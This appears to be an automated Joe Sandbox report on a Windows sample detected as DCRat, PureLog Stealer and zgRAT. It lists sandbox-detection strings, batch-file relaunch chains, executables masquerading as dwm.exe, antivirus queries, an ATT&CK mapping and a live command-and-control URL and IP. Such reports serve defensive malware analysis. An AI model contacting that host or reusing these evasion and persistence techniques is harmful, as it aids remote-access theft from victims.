Source: bridgenet.exe.bin.exe, 00000030.00000002.2018437321.000000001BD86000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: dwm.exe, 0000003A.00000002.2229404359.000000001B600000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: dwm.exe, 0000003A.00000002.2229404359.000000001B600000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllO
Source: xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, 0000000D.00000002.1533913299.000000001BC45000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Y00A
Source: bridgenet.exe.bin.exe, 0000001F.00000002.1863123940.000000001B063000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllF&`[
Source: bridgenet.exe.bin.exe, 00000015.00000002.1720686588.000000001B516000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}
Source: dwm.exe, 00000024.00000002.1902568282.000000001AD80000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlls
Source: xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, 0000000D.00000002.1533913299.000000001BC45000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}H0
Source: w32tm.exe, 0000002F.00000002.1970756779.000001E53A969000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllh
Source: bridgenet.exe.bin.exe, 0000001F.00000002.1863123940.000000001B0AA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, 0000000D.00000002.1533913299.000000001BB70000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000012.00000002.1579988851.0000017FB0437000.00000004.00000020.00020000.00000000.sdmp, xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, 0000001A.00000002.1805396503.000000001B8D0000.00000004.00000020.00020000.00000000.sdmp, xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, 0000002B.00000002.1972756001.000000001BA10000.00000004.00000020.00020000.00000000.sdmp, bridgenet.exe.bin.exe, 00000030.00000002.2018437321.000000001BD86000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000035.00000002.2007824721.00000293DEF8A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: bridgenet.exe.bin.exe, 00000015.00000002.1720686588.000000001B480000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll$
Source: dwm.exe, 00000024.00000002.1902568282.000000001AE21000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: y-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: dwm.exe, 00000024.00000002.1902568282.000000001AE4F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\C

Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xb2ojpgu\xb2ojpgu.cmdline"	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5z3arsde\5z3arsde.cmdline"	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDE49.tmp" "c:\Windows\System32\CSCEE8385358E3E4E5C92A1AE5417196AA8.TMP"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDB99.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCF6FBA02FA6D54D1FBEF275314C5F713F.TMP"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDE49.tmp" "c:\Windows\System32\CSCEE8385358E3E4E5C92A1AE5417196AA8.TMP"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe "C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe"	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\xDZppRkgYb.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe "C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Ye8GjO9RaC.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\bridgenet.exe.bin.exe "C:\Users\user\Desktop\bridgenet.exe.bin.exe"
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\FnlL3aVnrp.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe "C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe"
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\lQjAOk5IUW.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\bridgenet.exe.bin.exe "C:\Users\user\Desktop\bridgenet.exe.bin.exe"
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\75OpyD0wFt.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Internet Explorer\images\dwm.exe "C:\Program Files\Internet Explorer\images\dwm.exe"
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\yC86nPihDu.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe "C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe"
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\fDDEz4CMJh.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\bridgenet.exe.bin.exe "C:\Users\user\Desktop\bridgenet.exe.bin.exe"
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\B8RGJU8TMM.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 00000000.00000002.1396182638.0000000013041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: bridgenet.exe.bin.exe PID: 1432, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xvmLxyNtcnPgpmdKoWywaPsdXPf.exe PID: 3720, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xvmLxyNtcnPgpmdKoWywaPsdXPf.exe PID: 2036, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: bridgenet.exe.bin.exe, type: SAMPLE
Source: Yara match	File source: 0.0.bridgenet.exe.bin.exe.af0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1339348052.0000000000AF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\Program Files (x86)\jDownloader\config\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Internet Explorer\images\dwm.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: bridgenet.exe.bin.exe, type: SAMPLE
Source: Yara match	File source: 0.0.bridgenet.exe.bin.exe.af0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files (x86)\jDownloader\config\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Internet Explorer\images\dwm.exe, type: DROPPED

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 00000000.00000002.1396182638.0000000013041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: bridgenet.exe.bin.exe PID: 1432, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xvmLxyNtcnPgpmdKoWywaPsdXPf.exe PID: 3720, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xvmLxyNtcnPgpmdKoWywaPsdXPf.exe PID: 2036, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: bridgenet.exe.bin.exe, type: SAMPLE
Source: Yara match	File source: 0.0.bridgenet.exe.bin.exe.af0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1339348052.0000000000AF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\Program Files (x86)\jDownloader\config\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Internet Explorer\images\dwm.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: bridgenet.exe.bin.exe, type: SAMPLE
Source: Yara match	File source: 0.0.bridgenet.exe.bin.exe.af0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files (x86)\jDownloader\config\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Internet Explorer\images\dwm.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	1 Windows Management Instrumentation	1 Scripting	11 Process Injection	333 Masquerading	OS Credential Dumping	111 Security Software Discovery	1 Taint Shared Content	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	31 Registry Run Keys / Startup Folder	31 Registry Run Keys / Startup Folder	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Software Packing	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	14 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
bridgenet.exe.bin.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
bridgenet.exe.bin.exe	57%	Virustotal		Browse
bridgenet.exe.bin.exe	100%	Avira	HEUR/AGEN.1323342
bridgenet.exe.bin.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files\Internet Explorer\images\dwm.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\FnlL3aVnrp.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\fDDEz4CMJh.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\Ye8GjO9RaC.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\75OpyD0wFt.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\62xZ8bmi7l.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\xDZppRkgYb.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\yC86nPihDu.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\B8RGJU8TMM.bat	100%	Avira	BAT/Delbat.C
C:\Program Files (x86)\jDownloader\config\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	100%	Avira	HEUR/AGEN.1323342
C:\Program Files (x86)\jDownloader\config\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	100%	Avira	HEUR/AGEN.1323342
C:\Program Files (x86)\jDownloader\config\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\lQjAOk5IUW.bat	100%	Avira	BAT/Delbat.C
C:\Program Files\Internet Explorer\images\dwm.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\jDownloader\config\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\jDownloader\config\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\jDownloader\config\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\jDownloader\config\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files\Internet Explorer\images\dwm.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files\Windows Photo Viewer\en-GB\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files\Windows Photo Viewer\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\BazpdGXT.log	25%	ReversingLabs
C:\Users\user\Desktop\LfwFFKlf.log	25%	ReversingLabs
C:\Users\user\Desktop\LwOexCEJ.log	25%	ReversingLabs
C:\Users\user\Desktop\LzBDVIdW.log	25%	ReversingLabs
C:\Users\user\Desktop\NpAnHTXs.log	25%	ReversingLabs
C:\Users\user\Desktop\UOGmotWX.log	25%	ReversingLabs
C:\Users\user\Desktop\ZdtVejrZ.log	25%	ReversingLabs
C:\Users\user\Desktop\ZmWTGheo.log	25%	ReversingLabs
C:\Users\user\Desktop\xQYgnzsS.log	25%	ReversingLabs
C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat

Source	Detection	Scanner	Label
http://977255cm.nyashkoon.in/secureWindows.php	100%	Avira URL Cloud	malware
http://977255cm.nyashkoon.in/	100%	Avira URL Cloud	malware
http://977255cm.nyashkoon.in	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false		high
977255cm.nyashkoon.in	104.21.112.1	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://977255cm.nyashkoon.in/secureWindows.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://977255cm.nyashkoon.in/	dwm.exe, 0000003A.00000002.2151681600.0000000002F58000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	bridgenet.exe.bin.exe, 00000000.00000002.1392935166.000000000387E000.00000004.00000800.00020000.00000000.sdmp, xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, 0000000D.00000002.1528700199.00000000035C9000.00000004.00000800.00020000.00000000.sdmp, bridgenet.exe.bin.exe, 00000015.00000002.1702933533.0000000002E26000.00000004.00000800.00020000.00000000.sdmp, xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, 0000001A.00000002.1783415067.0000000003318000.00000004.00000800.00020000.00000000.sdmp, bridgenet.exe.bin.exe, 0000001F.00000002.1832292838.0000000002A28000.00000004.00000800.00020000.00000000.sdmp, dwm.exe, 00000024.00000002.1866783760.00000000027DC000.00000004.00000800.00020000.00000000.sdmp, xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, 0000002B.00000002.1919740627.000000000339A000.00000004.00000800.00020000.00000000.sdmp, bridgenet.exe.bin.exe, 00000030.00000002.1974446722.00000000036BC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepn	dwm.exe, 0000003A.00000002.2151681600.0000000002F58000.00000004.00000800.00020000.00000000.sdmp	false		high
http://977255cm.nyashkoon.in	xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, 0000000D.00000002.1528700199.00000000035C9000.00000004.00000800.00020000.00000000.sdmp, xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, 0000000D.00000002.1528700199.000000000379B000.00000004.00000800.00020000.00000000.sdmp, bridgenet.exe.bin.exe, 00000015.00000002.1702933533.0000000002FF8000.00000004.00000800.00020000.00000000.sdmp, bridgenet.exe.bin.exe, 00000015.00000002.1702933533.0000000002E26000.00000004.00000800.00020000.00000000.sdmp, xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, 0000001A.00000002.1783415067.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, 0000001A.00000002.1783415067.0000000003318000.00000004.00000800.00020000.00000000.sdmp, bridgenet.exe.bin.exe, 0000001F.00000002.1832292838.0000000002A28000.00000004.00000800.00020000.00000000.sdmp, bridgenet.exe.bin.exe, 0000001F.00000002.1832292838.0000000002BF9000.00000004.00000800.00020000.00000000.sdmp, dwm.exe, 00000024.00000002.1866783760.00000000027DC000.00000004.00000800.00020000.00000000.sdmp, dwm.exe, 00000024.00000002.1866783760.00000000029AD000.00000004.00000800.00020000.00000000.sdmp, xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, 0000002B.00000002.1919740627.000000000339A000.00000004.00000800.00020000.00000000.sdmp, xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, 0000002B.00000002.1919740627.000000000356B000.00000004.00000800.00020000.00000000.sdmp, bridgenet.exe.bin.exe, 00000030.00000002.1974446722.000000000388D000.00000004.00000800.00020000.00000000.sdmp, bridgenet.exe.bin.exe, 00000030.00000002.1974446722.00000000036BC000.00000004.00000800.00020000.00000000.sdmp, dwm.exe, 0000003A.00000002.2151681600.0000000002F58000.00000004.00000800.00020000.00000000.sdmp, dwm.exe, 0000003A.00000002.2151681600.0000000003129000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.112.1	977255cm.nyashkoon.in	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1590016
Start date and time:	2025-01-13 13:32:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	65
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	bridgenet.exe.bin.exe
Detection:	MAL
Classification:	mal100.spre.troj.expl.evad.winEXE@107/67@2/1
EGA Information:	Successful, ratio: 21.4%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.175.87.197
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target bridgenet.exe.bin.exe, PID 1876 because it is empty
Execution Graph export aborted for target bridgenet.exe.bin.exe, PID 4316 because it is empty
Execution Graph export aborted for target dwm.exe, PID 2416 because it is empty
Execution Graph export aborted for target dwm.exe, PID 5648 because it is empty
Execution Graph export aborted for target dwm.exe, PID 6848 because it is empty
Execution Graph export aborted for target xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, PID 2036 because it is empty
Execution Graph export aborted for target xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, PID 3628 because it is empty
